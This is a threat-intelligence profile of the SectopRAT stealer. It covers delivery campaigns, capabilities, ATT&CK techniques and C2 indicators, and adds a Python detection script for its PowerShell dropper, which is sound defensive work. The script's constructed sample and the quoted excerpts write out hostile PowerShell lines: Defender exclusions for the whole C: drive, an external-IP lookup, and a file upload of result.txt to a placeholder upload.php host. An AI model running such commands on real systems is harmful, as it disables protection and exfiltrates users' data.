SectopRAT
SectopRAT is a .NET-based information stealer and remote access trojan, also tracked in the cited reporting as ArechClient and Arechclient2, and described as active since at least 2019. Across the cited campaigns it is consistently used as a final or secondary payload delivered by other malware and loaders, including ACRStealer, StealC, CastleLoader, BabaDeda Loader, GHOSTPULSE, HiJack Loader/IDAT Loader, NetSupport RAT, and ClickFix-driven chains. Delivery vectors mentioned in the cited reporting include malicious PowerShell droppers, fake browser or software update lures, fake Google verification and CAPTCHA/ClickFix pages, trojanized installers, signed malicious MSIX packages, ZIP archives, DLL side-loading chains, compromised WordPress sites, malvertising, SEO poisoning, and fraudulent Google Ads redirects.
The malware is described as combining stealer and RAT functionality. Reported capabilities include theft of browser credentials and cookies, browser session hijacking, theft of email client data, cryptocurrency wallet theft, harvesting of application credentials and installed software information, language discovery, storage enumeration, process injection, privilege manipulation, PowerShell execution, persistence, webcam access, and keylogging. Reporting also notes that RAT-class use of SectopRAT can enable hands-on-keyboard activity such as discovery, lateral movement, and persistence. In one analyzed chain, the final SectopRAT payload targeted browser credentials, email clients, and cryptocurrency wallets.
Observed tradecraft around SectopRAT delivery includes reflective .NET assembly loading, AES-256-CBC decryption, Donut shellcode injection, direct NTDLL syscalls, AMSI bypass by patching the CLR amsi.dll reference in memory, fiber-based shellcode execution, process doppelgänging, DLL side-loading, in-memory PE loading, Windows Defender exclusions, reconnaissance, exfiltration, and cleanup/self-deletion. One PowerShell delivery script downloaded SectopRAT from fancysunshine[.]top, added Defender exclusions for C:\ and selected processes, queried ifconfig.me/ip, collected the USERNAME value, checked for a scheduled task named MSSecurity, exfiltrated result.txt to upload.php on the same domain, and deleted artifacts afterward.
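As an added example (not from the page or the cited reporting), the following Python triages a PowerShell script body for the dropper behaviours described above, resolving simple variable assignments so that `Add-MpPreference -ExclusionPath $folderPath` is judged on the literal value. The sample scripts are constructed; the cmdlets Get-ScheduledTask and Invoke-WebRequest and the host example.invalid are assumptions, not values from the reporting.

```python
"""Triage a PowerShell script body (e.g. captured ScriptBlock text) for the
dropper behaviours described above. Variable resolution lets the rules see the
literal values hidden behind $folderPath-style indirection."""
import re

# Rules follow the page's description of the dropper; heuristics, not a signature.
RULES = [
    ("defender_exclusion_drive_root",
     re.compile(r"Add-MpPreference\s+-ExclusionPath\s+[\"']?[A-Za-z]:\\?[\"']?(?:\s|$)", re.I)),
    ("defender_exclusion_process", re.compile(r"Add-MpPreference\s+-ExclusionProcess\b", re.I)),
    ("external_ip_lookup", re.compile(r"Invoke-RestMethod\b.*ifconfig\.me/ip", re.I)),
    ("mssecurity_task_check", re.compile(r"Get-ScheduledTask\b.*\bMSSecurity\b", re.I)),
    ("syswow64_relaunch", re.compile(r"SysWOW64\\WindowsPowerShell\\v1\.0\\powershell\.exe", re.I)),
    ("upload_php_exfil", re.compile(r"Invoke-(?:WebRequest|RestMethod)\b.*upload\.php", re.I)),
]
ASSIGN = re.compile(r"^\s*\$(\w+)\s*=\s*([\"'])(.*?)\2\s*$")  # $name = "literal"

def resolve_variables(lines):
    """Collect quoted-literal assignments and expand $name references elsewhere."""
    values = {m.group(1): m.group(3) for m in map(ASSIGN.match, lines) if m}
    return [re.sub(r"\$(\w+)", lambda m: values.get(m.group(1), m.group(0)), l) for l in lines]

def triage(script_text, threshold=3):
    """Return matched rule names and 'suspicious' once `threshold` behaviours co-occur."""
    matched = []
    for line in resolve_variables(script_text.splitlines()):
        matched += [n for n, p in RULES if n not in matched and p.search(line)]
    return {"matched": matched, "verdict": "suspicious" if len(matched) >= threshold else "benign"}

# Constructed sample mirroring the dropper described above; not a real capture.
DROPPER_SAMPLE = r"""
$folderPath = "C:\"
$processName = "example.exe"
Add-MpPreference -ExclusionPath $folderPath
Add-MpPreference -ExclusionProcess $processName
& "$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -File $PSCommandPath
$externalIP = Invoke-RestMethod -Uri "http://ifconfig.me/ip"
$username = $env:USERNAME
$task = Get-ScheduledTask -TaskName "MSSecurity" -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri "http://example.invalid/upload.php" -Method Post -InFile result.txt
"""
# Constructed benign admin script: a scoped exclusion and an unrelated task.
ADMIN_SAMPLE = r"""
Add-MpPreference -ExclusionPath "C:\Build\Artifacts"
Get-ScheduledTask -TaskName "NightlyBackup"
"""
```

The drive-root rule deliberately ignores scoped exclusions such as C:\Build\Artifacts, so the benign sample produces no matches while the constructed dropper trips all six rules.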
The content links SectopRAT to multiple criminal ecosystems and campaigns. It was observed in StealC-linked activity by Proofpoint and IBM X-Force; in TAG-150/GrayBravo infrastructure and delivery chains documented by Recorded Future and Breakglass Intelligence; in ClearFake campaigns using EtherHiding and BNB Smart Chain testnet smart contracts; in GrayCharlie/SmartApeSG compromises of U.S. law firm WordPress sites; and in Slack-themed malware campaigns. Breakglass Intelligence assessed shared infrastructure between ACRStealer and SectopRAT as strong evidence of a single operator running both the Go-based ACRStealer and the .NET-based SectopRAT.
High-confidence infrastructure and indicators directly mentioned in the content include fancysunshine[.]top and its path /s8dj3bh9w877/ for payload delivery and exfiltration; a SectopRAT sample observed by Elastic retrieving C2 information from Pastebin and connecting to 195.201.198[.]179:15647; TAG-150-associated SectopRAT C2 communications on TCP ports 15647, 15747, 15847, 15947, 14367, and 9000; and Breakglass-identified SectopRAT C2 servers 94[.]26[.]106[.]216, 89[.]110[.]107[.]177, 144[.]31[.]90[.]139, and 194[.]150[.]220[.]218, with 94[.]26[.]106[.]216:9000 responding on /wbinjget and /wmglb. Additional reporting places SectopRAT-related infrastructure within broader malicious hosting clusters such as AS202412/OMEGATECH and notes overlap with AmateraStealer and NetSupport RAT infrastructure.
Groups observed using it
5 distinct threat actors attributed by public researchers.
These malware families are frequently observed as initial infection vectors that deliver a wide range of secondary payloads, including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT...
The PowerShell dropper (bruce.php) unpacks through five stages -- XOR decryption, reflective .NET assembly loading, AES-256-CBC decryption, Donut shellcode injection via raw NTDLL syscalls -- before deploying the final SectopRAT info-stealer targeting browser credentials, email clients, and cryptocurrency wallets.
Operators connect via C2, run system reconnaissance, and can drop SectopRAT as a secondary payload.
Techniques & procedures
35 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Initial Access
1 technique
ClearFake spreads by compromising legitimate websites and injecting hidden JavaScript code into their pages. Victims do not need to do anything suspicious to get infected. Simply visiting a tampered legitimate site can trigger the malware’s multi-stage delivery chain.
Execution
6 techniques
The malware collects the victim’s external IP address and username, checks for an existing scheduled task named MSSecurity...
During routine malware analysis, I discovered a PowerShell-based dropper script being delivered from a malicious C2 domain... This script disables security controls, fetches 2 payloads (SectopRAT, HiJack Loader), exfiltrates data, and removes all traces of its execution.
Stage 3 -- Legitimate Python Binary: The ZIP extracts to a directory containing FNPLicensingService.exe -- which is actually a renamed, legitimately signed CPython 3.15 pythonw.exe... Stage 4 -- Obfuscated Python Loader: chrome_100_percent.pak ... is an ASCII text file containing obfuscated Python code.
Persistence
2 techniques
Privilege Escalation
2 techniques
Stealth
8 techniques
MITRE ATT&CK Mapping ... Defense Evasion: Software Packing (T1027.002) -- reversed Base64 + zlib compression
MITRE ATT&CK Mapping ... Defense Evasion: Masquerading (T1036.005) -- FNPLicensingService.exe (renamed pythonw.exe)
Before exiting, the malware removes all downloaded ZIPs and folders, the exfiltrated result file, and itself, via a helper script deleter.ps1.
The chrome_100_percent.pak file decodes through three distinct layers... reverse string, base64 decode, zlib decompress ... rolling XOR decrypts embedded SectopRAT PE
Architecture gate: Forces relaunch in 32-bit PowerShell via $env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe... MITRE ATT&CK Mapping... T1218: 32-bit PowerShell relaunch via SysWOW64.
Four contracts served distinct roles: Smart Contract A delivered the anti-analysis dispatcher...
Credential Access
3 techniques
Victims saw a convincing fake Google reCAPTCHA overlay complete with an “I’m not a robot” checkbox. Clicking it triggered the ClickFix social engineering panel...
Discovery
5 techniques
The malware collects the victim’s external IP address... $externalIP = Invoke-RestMethod -Uri "http://ifconfig.me/ip"
The malware collects the victim’s external IP address and username... $username = $env:USERNAME
Collection
6 techniques
Stage 9: Data Theft -- browser credential/cookie theft, cryptocurrency wallet theft, application credential harvesting.
SectopRAT... Email client harvesting -- Outlook and Thunderbird data extraction.
Clicking it triggered the ClickFix social engineering panel, which simultaneously injected a malicious command directly into the victim’s clipboard.
Command and Control
4 techniques
In SectopRAT samples, the malware first reaches out to Pastebin to retrieve the command and control address.
Stage 8: C2 Communication -- HTTP to 94[.]26[.]106[.]216:9000; /wbinjget -- heartbeat ... /wmglb -- payload/config download
Exfiltration
1 technique
Other
1 technique
The script attempts to evade detection by creating Windows Defender exclusions for the entire C drive and two known processes often abused in malware campaigns:
Add-MpPreference -ExclusionPath $folderPath
Add-MpPreference -ExclusionProcess $processName
Add-MpPreference -ExclusionProcess $processName1
IOCs tracked for this family
152 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains and DNS infrastructure, file hashes (MD5, SHA-1, SHA-256), and other indicator types from public reporting.
Recent activity
40 sources tracked across advisories, community write-ups, and news.
SectopRAT is listed as a malware family delivered in StealC-linked activity.
A remote access trojan observed as a payload in StealC-related infection chains.
SectopRAT was observed as a payload delivered in StealC-related operations.
A remote access trojan delivered via DLL side-loading in the BabaDeda Loader campaign.